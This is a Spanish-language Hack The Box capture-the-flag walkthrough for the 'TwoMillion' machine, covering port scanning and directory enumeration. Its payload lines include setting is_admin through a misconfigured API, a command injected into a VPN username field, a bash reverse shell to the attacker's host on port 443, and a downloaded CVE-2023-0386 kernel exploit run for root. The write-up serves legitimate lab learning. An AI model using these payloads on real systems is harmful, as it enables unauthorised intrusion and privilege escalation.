TwoMillion

✍️ Autor: TRX & TheCyberGeek 🔍 Dificultad: Fácil 📅 Fecha de creación: 7/06/2023

Last updated 4 months ago

Was this helpful?

TwoMillion

✍️ Autor: TRX & TheCyberGeek 🔍 Dificultad: Fácil 📅 Fecha de creación: 7/06/2023

🔍 RECONOCIMIENTO

En primer lugar, tras conectarnos a la máquina, utilizamos el comando:

ping -c 1 10.10.11.221

para verificar la conectividad de red.

A continuación, realizamos el comando:

nmap -sC -sV 10.10.11.221

para realizar un escaneo de puertos y servicios detallado en la dirección IP.

Como podemos observar durante el escaneo que el puerto 22 perteneciente al servicio SSH y el puerto 80 perteneciente al servicio HTTP están abiertos por lo que a continuación se indagará más.

🔎 EXPLORACIÓN

Se utiliza el comando:

sudo nmap -sCV -p22,80 -v 10.10.11.221

para que nos proporcione más información sobre esos puertos específicamente.

Revisamos el puerto 80.

Se asimila a la página oficial de Hack The Box pero no vemos nada interesante por lo que revisamos los directorios.

gobuster dir -u http://2million.htb/ --wordlist /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt --exclude-length 162

Nos llama la atención el directorio /invite se asimila a como se tenía que registrar la gente al principio en la plataforma ya que se necesitaba un código de invitación. Tras inspeccionar la página encontramos la función llamada makeInviteCode.

La llamamos.

Como vemos esta encriptada en ROT13 por lo que desencriptamos.

Realizamos lo que nos comunica la pista.

curl -s -X POST "http://2million.htb/api/v1/invite/generate"

Está el código en base64 por lo que decodificamos.

echo "SDg2RjUtUUdRMDUtWEdEMTItU1o3QTg=" | base64 -d

Ponemos el código de invitación.

Nos logueamos con las credenciales registradas.

Vamos al apartado de Access. Miramos los endpoints de la API.

curl -s -X GET "http://2million.htb/api/v1" -v

Nos sale Unauthorized por lo que tenemos que coger la cookie session.

curl -s -X GET "http://2million.htb/api/v1" -H "Cookie: PHPSESSID=ekuhv9pthbgidsinr34h04n0hq" | jq

No somos administradores. Tampoco podemos generar una VPN. Vemos que podemos actualizar datos del usuario así que probamos.

curl -s -X PUT "http://2million.htb/api/v1/admin/settings/update" -H "Cookie: PHPSESSID=ekuhv9pthbgidsinr34h04n0hq" -H "Content-Type: application/json"| jq

Nos avisa del email por lo que añadimos.

curl -s -X PUT "http://2million.htb/api/v1/admin/settings/update" -H "Cookie: PHPSESSID=ekuhv9pthbgidsinr34h04n0hq" -H "Content-Type: application/json" -d '{"email":"bea@gmail.com"}'| jq

Nos dice que falta un parámetro por si es administrador.

curl -s -X PUT "http://2million.htb/api/v1/admin/settings/update" -H "Cookie: PHPSESSID=ekuhv9pthbgidsinr34h04n0hq" -H "Content-Type: application/json" -d '{"email":"bea@gmail.com", "is_admin":1}'| jq

Somos administradores lo que significa que la API está mal configurada. Por si acaso revisamos.

curl -s -X GET "http://2million.htb/api/v1/admin/auth" -H "Cookie: PHPSESSID=ekuhv9pthbgidsinr34h04n0hq" | jq

Intentamos generar una VPN ya que somos admin.

curl -s -X POST "http://2million.htb/api/v1/admin/vpn/generate" -H "Cookie: PHPSESSID=ekuhv9pthbgidsinr34h04n0hq" | jq

Matizamos lo que se nos avisa.

curl -s -X POST "http://2million.htb/api/v1/admin/vpn/generate" -H "Cookie: PHPSESSID=ekuhv9pthbgidsinr34h04n0hq" -H "Content-Type: application/json"| jq

Ahora nos pide el parámetro username.

curl -s -X POST "http://2million.htb/api/v1/admin/vpn/generate" -H "Cookie: PHPSESSID=ekuhv9pthbgidsinr34h04n0hq" -H "Content-Type: application/json" -d '{"username":"beafn28"}'| jq

La respuesta ya no está en JSON por lo que lo quitamos.

🚀 EXPLOTACIÓN

Genera una VPN por el usuario que le diga. Por lo que hacemos lo siguiente.

curl -s -X POST "http://2million.htb/api/v1/admin/vpn/generate" -H "Cookie: PHPSESSID=ekuhv9pthbgidsinr34h04n0hq" -H "Content-Type: application/json" -d '{"username":"prueba; whoami;"}'

Somos www-data por lo que tenemos RCE.

curl -s -X POST "http://2million.htb/api/v1/admin/vpn/generate" -H "Cookie: PHPSESSID=ekuhv9pthbgidsinr34h04n0hq" -H "Content-Type: application/json" -d '{"username": "prueba; bash -c \"bash -i >& /dev/tcp/10.10.14.58/443 0>&1\";"}'

Nos conectamos.

nc -lnvp 443

Tenemos un fichero .env interesante mostramos su contenido.

Migramos de usuario.

ssh admin@2million.htb

🔐 PRIVILEGIOS

Al estar dentro y ejecutar:

whoami

aún no somos root, por lo que hacemos:

sudo -l

para ver si hay algo para explotar pero nos pide contraseña. Tampoco tenemos permisos SUID.

Nos dice que tenemos un mail.

Al ver la información del sistema en el que nos encontramos encontramos este exploit.

Nos lo descargamos en nuestra máquina víctima tras comprimirlo en nuestra máquina anfitrión.

wget http://10.10.14.58/comprimido.zip

Abrimos otra terminal y nos logueamos a través de ssh y también nos situamos en el directorio /tmp/CVE-2023-0386.

PRIMERA TERMINAL
make all
./fuse ./ovlcap/lower ./gc

SEGUNDA TERMINAL
./exp

Tras realizar esto nos convertimos en root.

PreviousCap NextLame

Last updated 4 months ago

Was this helpful?